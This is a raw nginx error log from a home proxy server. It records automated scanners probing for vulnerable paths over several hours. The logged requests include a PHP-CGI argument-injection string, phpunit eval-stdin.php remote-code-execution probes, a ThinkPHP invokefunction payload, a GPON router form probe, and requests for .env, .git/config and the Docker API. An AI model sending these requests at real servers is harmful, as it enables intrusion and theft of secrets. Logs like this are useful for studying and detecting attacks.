open() "/var/www/html/solr/admin/cores" failed (2: No such file or directory), client: 46.101.127.41, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:34:43 [error] 298#298: *16603 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:34:43 [error] 298#298: *16605 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:35:03 [error] 298#298: *16607 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:35:03 [error] 295#295: *16609 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:39 [error] 296#296: *16625 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:40 [error] 296#296: *16625 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:40 [error] 296#296: *16625 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:40 [error] 296#296: *16625 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:40 [error] 296#296: *16625 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:40 [error] 296#296: *16625 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:40 [error] 296#296: *16625 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:41 [error] 296#296: *16625 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:42 [error] 296#296: *16625 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:43 [error] 296#296: *16625 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 23:39:44 [error] 296#296: *16625 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 37.60.250.29, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 01:23:08 [error] 295#295: *18195 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 01:23:08 [error] 295#295: *18195 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 02:25:44 [error] 296#296: *18235 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:08:07 [error] 297#297: *18293 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 221.15.29.126, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/02/02 03:27:13 [error] 297#297: *18300 open() "/var/www/html/.env" failed (2: No such file or directory), client: 162.243.121.238, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "78.131.122.113" +2026/02/02 03:27:13 [error] 297#297: *18301 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 162.243.121.238, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "78.131.122.113" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:45 [error] 298#298: *18321 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:46 [error] 298#298: *18321 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:47 [error] 298#298: *18321 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 03:59:48 [error] 298#298: *18321 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 217.154.38.135, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 04:14:17 [error] 298#298: *18331 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 216.218.206.69, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 04:20:03 